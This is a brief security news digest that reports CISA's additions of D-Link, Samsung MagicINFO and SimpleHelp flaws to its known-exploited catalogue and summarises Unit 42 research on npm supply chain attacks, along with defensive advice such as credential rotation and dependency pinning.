Exploited Vulnerabilities
CISA adds D-Link, Samsung and SimpleHelp flaws to KEV
CISA's April 24 KEV update added D-Link DIR-823X CVE-2025-29635, Samsung MagicINFO 9 Server CVE-2024-7399 and two SimpleHelp vulnerabilities. Several affected products are administrative or remote-support surfaces, which makes ownership and exposure validation more important than generic patch reminders.
Remote support, signage and edge-device management systems are often outside the cleanest asset inventories. Security teams should confirm whether these products exist, whether they are internet reachable and whether compensating controls are logged.
Software Supply Chain
Unit 42 frames npm supply chain risk as a persistent attacker workflow
Unit 42's April 24 npm threat landscape research describes modern package attacks as credential harvesting, CI/CD persistence and multi-stage payload delivery rather than isolated typosquatting. The article includes defensive steps such as credential rotation, dependency pinning and lifecycle-script controls.
Software supply chain exposure now reaches developer workstations, package registries, CI/CD secrets and cloud credentials. That makes engineering controls and security monitoring part of the same response plan.